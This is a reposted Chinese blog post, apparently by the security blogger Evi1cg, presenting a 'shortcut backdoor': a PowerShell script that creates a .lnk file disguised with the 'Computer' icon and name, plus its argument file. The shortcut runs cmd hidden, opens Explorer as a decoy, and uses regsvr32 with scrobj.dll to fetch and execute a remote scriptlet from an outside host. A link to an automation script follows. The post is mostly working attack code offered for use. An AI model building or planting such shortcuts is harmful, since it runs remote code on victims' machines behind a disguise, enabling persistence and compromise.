PS code:
$file = Get-Content “C:\Users\evi1cg\Desktop\backdoor\link\test.txt”
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(“C:\Users\evi1cg\Desktop\backdoor\link\计算机.lnk”)
$Shortcut.TargetPath = “%SystemRoot%\system32\cmd.exe”
$Shortcut.WindowStyle = 7
$Shortcut.IconLocation = “%SystemRoot%\System32\Shell32.dll,15”
$Shortcut.Arguments = ‘ ‘+ $file
$Shortcut.Save()
test.txt:
/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | regsvr32.exe /u /s /i:https://evi1cg.me/scripts/calc.png scrobj.dll
DEMO:
写了一个自动化的脚本,地址如下:
https://gist.github.com/Ridter/a360f94d8ac9a8c30227e3812dfbb329
DEMO:
![图片[2]-Shortcut Backdoor Creation - PowerShell Script Example](https://www.77169.net/wp-content/uploads/2018/05/2018052009412317.gif)
文章出处:Evi1cg’s blog
原文链接:https://evi1cg.me/archives/Shortcut_Backdoor.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END














暂无评论内容